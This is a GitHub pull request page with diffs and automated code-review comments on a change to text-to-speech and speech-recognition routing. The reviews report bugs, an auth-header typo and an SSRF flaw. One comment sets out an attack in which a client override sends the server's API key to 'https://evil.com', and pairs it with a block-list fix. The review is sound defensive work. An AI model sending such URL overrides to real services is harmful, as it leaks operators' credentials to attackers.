+            api_key=api_key,
+        )

-    if engine_type in {"coze_tts", "coze"}:
-        stream = await _stream_coze_tts(config, text, overrides)
-        return StreamingResponse(stream, media_type="audio/mpeg")
+    payload = _build_unspeech_payload(
+        engine_id=engine_id,
+        runtime_config=runtime_config,
+        text=text,
+        overrides=overrides,
+    )

-    base_url_override, api_key_override = _resolve_connection_overrides(overrides)
-    payload: Dict[str, Any] = {"model": config.model, "input": text}
-    payload.update(config.default_params)
-    payload.update(sanitize_config(overrides))
+    speech_path = runtime_config.paths.get("speech") if runtime_config.paths else None
+    url = runtime_config.base_url.rstrip("/") + normalize_path(speech_path or "/audio/speech")

Evidence

The TTS execution path now only special-cases Volcengine/Alibaba; everything else is forced through
_build_unspeech_payload, which hard-requires model and voice. But dify-tts and coze-tts
engine configs do not define a model, so they cannot satisfy the new required payload fields.

backend/app/api/tts.py[76-115]
backend/app/api/tts.py[376-389]
backend/config/engines.yaml[138-179]

Agent prompt

The issue below was found during a code review. Follow the provided context and guidance below and implement a solution

## Issue description
`backend/app/api/tts.py` removed the dedicated Dify/Coze TTS execution paths, but `backend/config/engines.yaml` still defines `dify-tts` and `coze-tts` engines that don&amp;#x27;t have an OpenAI-style `model`/`voice` contract. As a result, requests to these engines will now fail with &amp;quot;Missing model&amp;quot; or send incompatible JSON to `/text-to-audio` / Coze endpoints.
## Issue Context
The PR focuses on direct backend routing for Volcengine/Alibaba. That change unintentionally (or implicitly) altered behavior for other TTS engine types.
## Fix Focus Areas
- backend/app/api/tts.py[76-115]
- backend/app/api/tts.py[376-415]
- backend/config/engines.yaml[138-179]

ⓘ Copy this prompt and use it to remediate the issue with your preferred AI generation tools

2. Volcengine auth header typo 🐞 Bug ✓ Correctness

Description

The Volcengine forwarder sets Authorization: Bearer;{api_key} (semicolon) instead of the standard
Bearer format used elsewhere in the backend. This is very likely to cause authentication failures
for all Volcengine TTS requests.

Code

backend/app/api/tts.py[R583-587]

+    headers = {
+        "Content-Type": "application/json",
+        "Authorization": f"Bearer;{api_key}",
+    }
+    headers.update(runtime_config.headers)

Evidence
The Volcengine forwarder uses a different Authorization header format than both the generic TTS
relay and the ASR codepaths. This inconsistency strongly indicates a typo/regression in the new
Volcengine routing logic.
backend/app/api/tts.py[583-587]
backend/app/api/tts.py[117-120]
backend/app/api/asr.py[337-342]

Agent prompt

The issue below was found during a code review. Follow the provided context and guidance below and implement a solution

## Issue description
Volcengine TTS forwarding sends `Authorization: Bearer;{api_key}` which is inconsistent with the rest of the backend (`Bearer {api_key}`) and is likely an authentication-breaking typo.
## Issue Context
This occurs only in the new direct Volcengine routing path.
## Fix Focus Areas
- backend/app/api/tts.py[574-616]

ⓘ Copy this prompt and use it to remediate the issue with your preferred AI generation tools

3. Volcengine health mismatch 🐞 Bug ⛯ Reliability

Description

volcengine-speech now uses the official provider base_url but still configures a /models
health path, while health checks always call base_url + health_path. This health check is no
longer aligned with the engine’s actual direct-routing behavior and may produce misleading unhealthy
results.

Code

backend/config/engines.yaml[R106-112]

   - id: volcengine-speech
     label: Volcengine
     type: openai_compat
-      base_url: https://unspeech.hyp3r.link/v1
+      base_url: https://openspeech.bytedance.com/api/v1/tts
     model: v1
     api_key_env: UNSPEECH_API_KEY
     paths:

Evidence

The health-check mechanism concatenates base_url with a (default) OpenAI-style path (/models).
After switching Volcengine to an official TTS endpoint base URL, this health strategy is no longer
obviously appropriate, especially since runtime requests bypass OpenAI-compatible semantics entirely
via the _forward_volcengine_tts path.

backend/config/engines.yaml[106-115]
backend/app/services/engines/health.py[24-27]
backend/app/api/tts.py[90-96]

Agent prompt

The issue below was found during a code review. Follow the provided context and guidance below and implement a solution

## Issue description
After switching Volcengine to a direct provider base URL, the engine health check still calls `base_url + /models` (OpenAI-compat style). This may not reflect real Volcengine availability and can create false negatives.
## Issue Context
Health checks are used by `/tts/engines/{engine}/health` and rely on `paths.health`.
## Fix Focus Areas
- backend/config/engines.yaml[106-115]
- backend/app/services/engines/health.py[10-44]

ⓘ Copy this prompt and use it to remediate the issue with your preferred AI generation tools

ⓘ The new review experience is currently in Beta. Learn more

github-actions · 2026-03-01T14:43:47Z

Blocker (can’t start the diff-scoped review)

gh pr view / gh pr diff fail with: error connecting to api.github.com (no outbound network/DNS in this sandbox). curl https://github.com also fails (Could not resolve host), so I can’t fetch PR feat: migrate TTS providers to backend direct routing #36 metadata/diff or post review comments/labels.

What I can confirm from the local GitHub Actions event payload

PR #36 (base dev, head fix/tts-voice-flow) has 8862 additions, 992 deletions, 66 files changed → Size = XL (recommended label: size/XL).

Unblock options (pick one)

Enable DNS + HTTPS egress to api.github.com (and rerun), so I can execute the required gh pr diff/view/edit/review workflow.
Or paste the outputs of:
- gh pr diff 36 --repo datawhalechina/whale-whisper --color=never
- gh pr view 36 --repo datawhalechina/whale-whisper --json headRefOid,additions,deletions,changedFiles,files --jq '.headRefOid, .additions, .deletions, .changedFiles, (.files[].path)'

With that diff, I’ll produce diff-line-only inline comment commands (with exact path + line + concrete code fixes) and the final gh pr review summary body, plus XL split suggestions grounded in the actual changes.

github-actions

Code Review Summary

This PR migrates TTS/ASR providers from relying on the unspeech proxy to direct backend routing to Volcengine and Alibaba Cloud endpoints. The implementation is substantial (66 files, 8730+/992-) with solid test coverage for the new backend relay paths and frontend request builders. Two issues warrant attention before merge.

PR Size: XL

Issues Found

Category	Critical	High	Medium
Security	1	0	0
Error Handling	0	1	0
Hygiene	0	0	1

Detail

[SECURITY-VULNERABILITY] SSRF via user-controlled provider URLs — _resolve_volcengine_tts_url and _resolve_alibaba_tts_ws_url accept arbitrary URLs from the client-supplied config dict. A caller can redirect the backend to internal services; if server-side API keys are configured via env vars, those credentials leak to the attacker-controlled endpoint. See inline comment on tts.py:459.
[ERROR-SILENT] Voice catalog load errors silently cached — _load_local_tts_voices_cached catches Exception and returns []. Combined with @lru_cache, a transient read/parse failure is permanently cached as empty until process restart, with zero logging. See inline comment on registry.py:204.
[HYGIENE] .idea/ directory committed — 8 IDE-specific files (inspection profiles, module config, VCS mappings) are tracked. These should be added to .gitignore alongside .vscode/.

Review Coverage

Automated review by Claude AI

backend/app/api/tts.py

backend/app/services/providers/registry.py

qodo-code-review · 2026-03-01T14:44:56Z

backend/app/api/tts.py

 @router.post("/engines")
-async def run_tts_engine(request: EngineRunRequest) -> StreamingResponse:
-    engine_id = _resolve_engine_id(request.engine)
-    config = _get_engine_config(engine_id)
-    text = _coerce_text(request.data)
+async def run_tts_engine(request: EngineRunRequest) -> Response:
+    engine_id = _resolve_tts_engine_id(request.engine)
+    runtime_config = _get_tts_engine_config(engine_id)
+
+    text = _extract_tts_input(request.data)
    if not text:
        raise HTTPException(status_code=400, detail="Missing text input")

-    engine_type = (config.engine_type or "openai_compat").lower()
    overrides = request.config if isinstance(request.config, dict) else {}
+    api_key = _resolve_tts_api_key(runtime_config, overrides)
+    if not api_key:
+        raise HTTPException(status_code=400, detail="Missing apiKey for TTS provider")
+
+    if engine_id in VOLCENGINE_ENGINE_IDS:
+        return await _forward_volcengine_tts(
+            runtime_config=runtime_config,
+            text=text,
+            overrides=overrides,
+            api_key=api_key,
+        )

-    if engine_type in {"dify_tts", "dify"}:
-        stream = await _stream_dify_tts(config, text, overrides)
-        return StreamingResponse(stream, media_type="audio/mpeg")
+    if engine_id in ALIBABA_ENGINE_IDS:
+        return await _forward_alibaba_tts(
+            engine_id=engine_id,
+            runtime_config=runtime_config,
+            text=text,
+            overrides=overrides,
+            api_key=api_key,
+        )

-    if engine_type in {"coze_tts", "coze"}:
-        stream = await _stream_coze_tts(config, text, overrides)
-        return StreamingResponse(stream, media_type="audio/mpeg")
+    payload = _build_unspeech_payload(
+        engine_id=engine_id,
+        runtime_config=runtime_config,
+        text=text,
+        overrides=overrides,
+    )

-    base_url_override, api_key_override = _resolve_connection_overrides(overrides)
-    payload: Dict[str, Any] = {"model": config.model, "input": text}
-    payload.update(config.default_params)
-    payload.update(sanitize_config(overrides))
+    speech_path = runtime_config.paths.get("speech") if runtime_config.paths else None
+    url = runtime_config.base_url.rstrip("/") + normalize_path(speech_path or "/audio/speech")


1. Dify/coze tts broken 🐞 Bug ✓ Correctness

run_tts_engine no longer routes dify_tts/coze_tts to their dedicated implementations and instead falls through to _build_unspeech_payload, which requires model and voice. Since dify-tts/coze-tts are still configured without a model, these engines will now error (400) or send incompatible payloads to their provider endpoints.

Agent Prompt

## Issue description `backend/app/api/tts.py` removed the dedicated Dify/Coze TTS execution paths, but `backend/config/engines.yaml` still defines `dify-tts` and `coze-tts` engines that don't have an OpenAI-style `model`/`voice` contract. As a result, requests to these engines will now fail with "Missing model" or send incompatible JSON to `/text-to-audio` / Coze endpoints. ## Issue Context The PR focuses on direct backend routing for Volcengine/Alibaba. That change unintentionally (or implicitly) altered behavior for other TTS engine types. ## Fix Focus Areas - backend/app/api/tts.py[76-115] - backend/app/api/tts.py[376-415] - backend/config/engines.yaml[138-179]

ⓘ Copy this prompt and use it to remediate the issue with your preferred AI generation tools

qodo-code-review · 2026-03-01T14:44:56Z

backend/app/api/tts.py

+    headers = {
+        "Content-Type": "application/json",
+        "Authorization": f"Bearer;{api_key}",
+    }
+    headers.update(runtime_config.headers)


2. Volcengine auth header typo 🐞 Bug ✓ Correctness

The Volcengine forwarder sets Authorization: Bearer;{api_key} (semicolon) instead of the standard Bearer format used elsewhere in the backend. This is very likely to cause authentication failures for all Volcengine TTS requests.

Agent Prompt

## Issue description Volcengine TTS forwarding sends `Authorization: Bearer;{api_key}` which is inconsistent with the rest of the backend (`Bearer {api_key}`) and is likely an authentication-breaking typo. ## Issue Context This occurs only in the new direct Volcengine routing path. ## Fix Focus Areas - backend/app/api/tts.py[574-616]

ⓘ Copy this prompt and use it to remediate the issue with your preferred AI generation tools

github-actions · 2026-03-01T15:52:29Z

backend/app/api/asr.py

+
+def _resolve_aliyun_dashscope_base_url(params: Dict[str, Any], config) -> str:
+    explicit_base = str(
+        _first_present(params, "base_url", "baseUrl", "dashscope_base_url", "dashscopeBaseUrl")


[SECURITY-VULNERABILITY] SSRF + credential leakage via unblocked dashscope_base_url / dashscopeBaseUrl override keys.

ASR_BLOCKED_CONFIG_KEYS blocks base_url and baseUrl, but _resolve_aliyun_dashscope_base_url also reads dashscope_base_url and dashscopeBaseUrl from the merged params. These keys are not in the block list, so a client can inject an arbitrary destination URL through the config override dict.

Attack scenario:

Client sends {"config": {"dashscopeBaseUrl": "https://evil.com"}} via the ASR endpoint

No dashscopeApiKey provided → server falls back to resolve_api_key(config.api_key_env) (reads DASHSCOPE_API_KEY env var)

Server POSTs to https://evil.com/compatible-mode/v1/chat/completions with Authorization: Bearer <real_api_key>

Attacker captures the DashScope API key

Suggested fix — add the extra keys to the block set:

ASR_BLOCKED_CONFIG_KEYS = frozenset( { "api_key", "apiKey", "base_url", "baseUrl", "dashscope_base_url", "dashscopeBaseUrl", "dashscope_api_key", "dashscopeApiKey", "engine", "filename", "file_name", "file", "content_type", "mime_type", } )

Alternatively, _resolve_aliyun_dashscope_base_url should only read from config.base_url (server-side YAML config) and never from client-provided overrides.

github-actions · 2026-03-01T15:52:43Z

backend/app/api/tts.py

+        async with ws_connect(
+            ws_url,
+            additional_headers={
+                "Authorization": api_key,


[LOGIC-BUG] Missing Bearer prefix in Alibaba TTS WebSocket Authorization header.

The DashScope WebSocket streaming synthesis API (/api-ws/v1/inference) expects Authorization: bearer <api_key>. This code sends the raw API key without the prefix, which will cause authentication to fail at runtime.

Compare with the ASR realtime code which correctly uses the prefix:

# asr.py:753 — correct "Authorization": f"Bearer {resolved['api_key']}",

Suggested fix:

additional_headers={ "Authorization": f"Bearer {api_key}", "X-DashScope-DataInspection": "enable", },

github-actions · 2026-03-01T15:52:56Z

backend/app/api/asr.py

+
+    model = ALIYUN_ASR_REALTIME_MODEL
+    if not model:
+        raise HTTPException(status_code=400, detail="Alibaba Bailian ASR missing model")


[LOGIC-BUG] Dead code — unreachable model validation.

ALIYUN_ASR_REALTIME_MODEL is a non-empty constant ("qwen3-asr-flash-realtime"), so if not model: on line 516 can never be True. This check is dead code and may mask a real intent (e.g., the model should perhaps come from config or overrides rather than be hardcoded).

Suggested fix — remove the dead branch:

def _resolve_aliyun_dashscope_credentials(config, overrides): ... model = ALIYUN_ASR_REALTIME_MODEL return { "params": params, "api_key": api_key, "model": model, "base_url": _resolve_aliyun_dashscope_base_url(params, config), }

github-actions · 2026-03-01T15:54:13Z

backend/app/api/asr.py

+    try:
+        await session.ws.close()
+    except Exception:
+        pass


[ERROR-SILENT] _close_aliyun_realtime_session swallows all exceptions without logging.

Two bare except Exception: pass blocks discard errors silently. While cleanup code often ignores errors, the project constitution requires logging — unexpected failures during teardown (e.g., hung reader task, broken pipe) become invisible when debugging production issues.

Suggested fix — add logger.debug so the errors are at least traceable:

async def _close_aliyun_realtime_session(session: AliyunRealtimeSession) -> None: if session.reader_task is not None: session.reader_task.cancel() try: await session.reader_task except asyncio.CancelledError: pass except Exception: logger.debug("Error awaiting Aliyun reader task during cleanup", exc_info=True) try: await session.ws.close() except Exception: logger.debug("Error closing Aliyun WebSocket during cleanup", exc_info=True)

github-actions

Code Review Summary

This is a large, ambitious PR that migrates TTS/ASR from third-party relay services to direct API integration with Volcengine and Alibaba DashScope, adds real-time streaming ASR, incremental TTS during LLM streaming, and microphone UI controls. The code is generally well-structured with good error handling patterns and comprehensive test coverage for utility functions. However, there is a critical SSRF vulnerability that must be fixed before merge.

PR Size: XL

(8862 additions, 992 deletions, 66 files)

Issues Found

Category	Critical	High	Medium	Low
Security	1	—	—	—
Logic	—	1	1	—
Error Handling	—	—	1	—

Critical

[SECURITY-VULNERABILITY] backend/app/api/asr.py:492 — SSRF + credential leakage via unblocked dashscope_base_url/dashscopeBaseUrl override keys. Client-provided config overrides can redirect server-side HTTP/WebSocket requests to arbitrary URLs, leaking the server's DashScope API key. The ASR_BLOCKED_CONFIG_KEYS block list must be extended to cover these alias keys.

High

[LOGIC-BUG] backend/app/api/tts.py:709 — Missing Bearer prefix in Alibaba TTS WebSocket Authorization header. The DashScope streaming synthesis API expects Authorization: bearer <key>, but the code sends the raw key. The ASR code at asr.py:753 correctly uses f"Bearer {api_key}". This will cause Alibaba CosyVoice TTS to fail with an auth error in production.

Medium

[LOGIC-BUG] backend/app/api/asr.py:515-517 — Dead code: model = ALIYUN_ASR_REALTIME_MODEL followed by if not model: is unreachable since the constant is a non-empty string. May mask intent to make the model configurable.
[ERROR-SILENT] backend/app/api/asr.py:832-838 — _close_aliyun_realtime_session has two except Exception: pass blocks that silently discard errors during cleanup. Should at least use logger.debug for production traceability.

Additional Note

The .idea/ directory (JetBrains IDE config) is included in the diff. As noted in the PR checklist, this should be removed from the commit and added to .gitignore.

Review Coverage

Automated review by Claude AI

Kiritogu added 12 commits February 13, 2026 15:19

fix(tts): serialize chunk requests and centralize voice config

220368e

fix(tts): fallback dashscope compatible-mode and improve errors

3014403

Revert "fix(tts): fallback dashscope compatible-mode and improve errors"

39fcebc

This reverts commit 3014403.

feat(tts): align streaming flow with airi and harden errors

c987aec

chore: commit all current local changes (exclude airi)

736306a

refactor(tts): move synthesis to frontend direct provider calls

a3681db

feat(asr): align aliyun nls transcription flow with airi

7157a12

feat(asr): migrate aliyun to bailian realtime and simplify settings

1a4e118

fix(provider): restore model/voice dropdown and lock aliyun asr realtime

e0f718e

fix: stabilize ASR stream and split mic test/live flows

8191bb9

feat: add explicit mute/unmute mic visual states

3808c0a

feat(tts): migrate speech providers to backend direct routing

7af80a4

greptile-apps bot reviewed Mar 1, 2026

View reviewed changes

github-actions bot added area/backend Touches backend (FastAPI/Python) area/frontend Touches frontend (Vue/TS) needs-review Needs careful review (large/complex changes) size/XL PR size: >= 1000 lines changed type/feature New feature labels Mar 1, 2026

github-actions bot reviewed Mar 1, 2026

View reviewed changes

backend/app/api/tts.py Outdated Show resolved Hide resolved

backend/app/services/providers/registry.py Outdated Show resolved Hide resolved

qodo-code-review bot reviewed Mar 1, 2026

View reviewed changes

fix(tts): harden provider URL handling and local voice loading

8612a4a

github-actions bot reviewed Mar 1, 2026

View reviewed changes

Conversation

Kiritogu commented Mar 1, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

概要

问题

解决方案

变更内容

核心变更

辅助变更

注意事项

破坏性变更

测试

自测方式

Checklist

Uh oh!

greptile-apps bot left a comment

Choose a reason for hiding this comment

Uh oh!

qodo-code-review bot commented Mar 1, 2026

Review Summary by Qodo

Walkthroughs

File Changes

Uh oh!

qodo-code-review bot commented Mar 1, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Code Review by Qodo

Uh oh!

github-actions bot commented Mar 1, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Uh oh!

github-actions bot left a comment

Choose a reason for hiding this comment

Code Review Summary

PR Size: XL

Issues Found

Detail

Review Coverage

Uh oh!

Uh oh!

Uh oh!

qodo-code-review bot Mar 1, 2026

Choose a reason for hiding this comment

Uh oh!

qodo-code-review bot Mar 1, 2026

Choose a reason for hiding this comment

Uh oh!

github-actions bot Mar 1, 2026

Choose a reason for hiding this comment

Uh oh!

github-actions bot Mar 1, 2026

Choose a reason for hiding this comment

Uh oh!

github-actions bot Mar 1, 2026

Choose a reason for hiding this comment

Uh oh!

github-actions bot Mar 1, 2026

Choose a reason for hiding this comment

Uh oh!

github-actions bot left a comment

Choose a reason for hiding this comment

Code Review Summary

PR Size: XL

Issues Found

Critical

High

Medium

Additional Note

Review Coverage

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

1 participant

Kiritogu commented Mar 1, 2026 •

edited

Loading

qodo-code-review bot commented Mar 1, 2026 •

edited

Loading

github-actions bot commented Mar 1, 2026 •

edited

Loading